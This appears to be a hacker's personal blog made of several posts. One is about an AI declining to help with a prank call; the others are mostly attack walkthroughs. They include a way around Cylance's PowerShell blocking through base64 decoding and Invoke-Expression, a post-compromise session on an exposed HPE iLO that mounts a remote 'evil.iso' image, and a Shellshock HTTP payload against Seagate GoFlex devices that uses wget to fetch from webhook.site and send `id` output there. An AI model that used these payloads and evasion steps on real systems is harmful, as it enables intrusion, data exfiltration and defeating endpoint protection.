When AI Just Doesn’t Get the Joke.

Like many of us, I’ve been exploring creative (and occasionally mischievous) ways to test the limits of AI. Recently, I thought it would be fun to combine AI with TTY services to pull a classic prank call on my wife while she was at work. Spoiler alert: it was a complete failure.

My first prompt went something like this:

“My wife works at [location]. Make a call to that place, get details about the menu and bar, then casually ask about Battletoads.”

The response? A polite but firm “I can’t make calls,” followed by a broken link and a handful of unrelated suggestions that didn’t come close to enabling the harmless mischief I had in mind.

I tried again with a different angle:

“I’m deaf, can you connect to a TTY service to make a call?”

Same result: dead links and unusable advice. After a few more prompts and experiments, it became clear—AI might be powerful, but it has no concept of fun.

Now, I never truly expected AI to get humor the way we do, but I did hope it might at least help facilitate it. Instead, when I asked whether prank calling or even the legendary art of phreaking was still alive, AI’s answer was essentially: not really.

And that’s when it hit me: while AI can automate tasks, analyze data, and streamline workflows, some things are just better left to people. Humor, spontaneity, and a little harmless mischief? That’s our domain.

So here’s my takeaway: AI is a great tool, but it doesn’t replace human creativity, playfulness, or the shared cultural quirks that make us laugh. Those belong to us.

And on that note… is your refrigerator running?

Bypass Cylance AV to run PowerShell Scripts.

So I was trying to automate the installation of some software using PowerShell (PS). Naturally I made up a ps script, but when I attempted to run it on machines with Cylance installed it was blocked by Cylance and it complained that it does not like me trying to run PS scripts. 

Challenge accepted! 

My first attempt was to use EncodedCommand, but wasted a bunch of time and gave up, lol. It has to be a, what I would say is a non-standard base64 encoding, to execute. Didn't find that out until I was a few hours in! Trying to find an easy way to ecode never panned out, even the great cyberchef failed me.

So I couldn't run PS scripts out right and didn't have time for EncodedCommand "im sure I was just doing something wong", so I moved on to Invoke-Expression (IE). 

M$ says, "The Invoke-Expression cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. Without Invoke-Expression, a string submitted at the command line is returned (echoed) unchanged." 

So we can use IE to execute any string, First I tried to just put my script in a variable, but PS never liked it. I think the line breaks or some char was messing it up, Then looked at reading a file and putting it into a variable. So I base64 encoded the text from my script and used [Convert]::FromBase64String to decode then wrote it to a file in C:\Users\Public\ because I couldn't be sure what user context it was going to write in so I bet on low privileges.  Then used Get-Content -Raw to pull it into a variable, passed it to IE and Whammy! it worked. The most complicated process I could come up with to bypass Cylance PS script blocking :)

Enjoy the 1's and 0's

IPMI exposure over the internet, IPMIPWN & post compromise activities.

Another stop along memory lane is my favored thing to boast about, IPMIPWN! :P

I thought I would dive back into Shodan and check out the status of the attack surface after all this time. As expected, still stocked with targets! So this time around I wanted to took a look beyond penetration and look at post compromise activity.

Its been a while since I first made IPMIPWN, so a few things have changed. The servers out there are so old that the ciphers used for ssh are no longer supported a modern desktop ssh clients by default, making my first ssh attempt post IPMIPWN hax0rin was much like the below:

ssh backdoor2@target.com

Unable to negotiate with target.com port 22: no matching key exchange method found. Their offer: diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

Google said to added -o KexAlgorithms=diffie-hellman-group14-sha1, Then: 

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 backdoor2@target.com

Unable to negotiate with target.com port 22: no matching host key type found. Their offer: ssh-dss

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss backdoor2@target.com

Unable to negotiate with target.com port 22: no matching cipher found. Their offer: aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc

And then:

ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc backdoor2@target.com

Unable to negotiate with target.com port 22: no matching MAC found. Their offer: hmac-sha1 

And then:

C:\Users\hacker> ssh -o KexAlgorithms=diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-dss -c aes256-cbc -m hmac-sha1 backdoor2@target.com

The authenticity of host 'target.com' can't be established.

DSA key fingerprint is SHA256:LkuLO3/0BBf4iCXIeOO/d9kjh987trtA30pZZkS/ruc.

This key is not known by any other names.

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added 'target.com' (DSA) to the list of known hosts.

backdoor2@target.com's password:

User:backdoor2 logged-in to ILOBRC444.(target.com)

iLO 3 Standard 1.26 at  Aug 26 2011

Server Name: SER_EPAPAR

Server Power: On

</>hpiLO->

 

Ok, so IPMIPWN got us this far, what next? A few possible attack paths might involve virtual media (VM) functionality. Here is how that might be setup:

First, See what VM is loaded if any

 </>hpiLO-> show map1/oemhp_vm1/cddr1

 Set our own VM

</>hpiLO-> cd map1/oemhp_vm1/cddr1

</map1/oemhp_vm1/cddr1>hpiLO-> set oemhp_image=http://cracker/evil.iso

Enable our "attacker controlled" VM

 </>hpiLO-> set /map1/oemhp_vm1/cddr1 oemhp_boot=connect

Confirm our changes

 </map1/oemhp_vm1/cddr1>hpiLO-> show

I used webhook.site to confirm this attack with great successes, as soon as you set oemhp_boot to connect, you should start seeing connection requests. You could also make your own Kali ISO that has a script to connect to a server somewhere, run on boot or network connection confirmation. More attack paths later >:)

Enjoy the 1's and 0's.. 

Happy New Year!!

 

so imma lilate, sue me :P

Getting a remote shell on Seagate GoFlex devices is still a thing almost ten years later!

Since I have been on a stroll down memory lane, I thought it would be fun to also revisit some of the bigger issues I have reported on in the past, like Getting a remote shell on any one of 68,000+ Seagate GoFlex devices. I found these devices are still plentiful on Shodan and despite all the time that has past. That's not all as they now easier to verify thanks to web services like webhook.site. In the past verifying you had RCE with these devices and the Shellshock bug in general could be tricky, but having something available to the public that catches callbacks makes it so much simpler. 

Here is what the new payload looks like using webhook.site:

GET /support/ HTTP/1.1

Host: vuln.device.ip.here

User-Agent: () { :; }; echo Content-Type: text/plain; echo; echo;

 PATH=/usr/bin:/usr/local/bin:/bin; export PATH; wget

 http://webhook.site/866285eb-9c4f-4269-997c-6c4d3a960139/a -O /tmp/junk2>&1;

Here is what it looks like when it hits webhook:

If your testing this out your self and using webhook to verify execution, and you see something like the above on your webhook session, w00t! You have just successfully verified its vulnerable to shellshock, it has wget installed and its allowed to make calls outside of its network!

Going a bit further you can also exploit this Shellshock webhook.site combo to exfiltrate some information from our target by adding the --post-data flag to our wget payload with a bash command surrounded by backticks, like this:

--post-data `id`

wget will send the output of the command as post data to webhook :)  

It blows my mind we can still find these on the internets, and even more so that after 9 years no one is patching anything. If you have devices in your network, please for the love of all that is good, update your firmware! 

That's it for now, enjoy the 1's and 0's

Arctic Code Vault Contributor: ✓

Since I am on an ego trip, I thought I would gloate some more by reminding all of a tool a developed with a friend of mine called Upnp-Exploiter back when I still ran DC414 that made it into the Github Arctic Code Vault! So even after the zombie apocalypse, you can use my tool :) If you don't know what the Vault project is you can read more about it Here. I am deeply honored by this and many thanks to Github for including our project! 

That's not all for this project however, another friend of mine caught a glimpse of it being used in a pentest by a company called TraceSecurity! Below is a screen capture of it in the pentest report :) Nothing makes me more prouder than my tools being used by fellow ethical hackers. I hope they got some findings with it on another host! 

That's all for now. Enjoy the 1's and 0's.

Hack3r Achievement Obtained!

You may have seen on my X feed by now, but if not. I am proud to say my IPMIPWN tool was added to not only Kali Linux, but to BlackArch Linux as well!! This happened earlier, but I haven't bragged on the blog yet :) It's so amazing it was so well liked and used! I hope it has helped many hackers in their education and professional careers. 

If you somehow don't know about these projects, welcome skiddy and go here and here and RTFM :P 

I loving giving back to the scene that has helped me so much and I am always trying to do more. Now I can say I honestly have in a "I hope" meaningful way! Thanks to whoever found my tool worthy and all the people at the Kali and BackArch organizations. You are all awesome! Thank you!!

Enjoy the 1's and 0's :)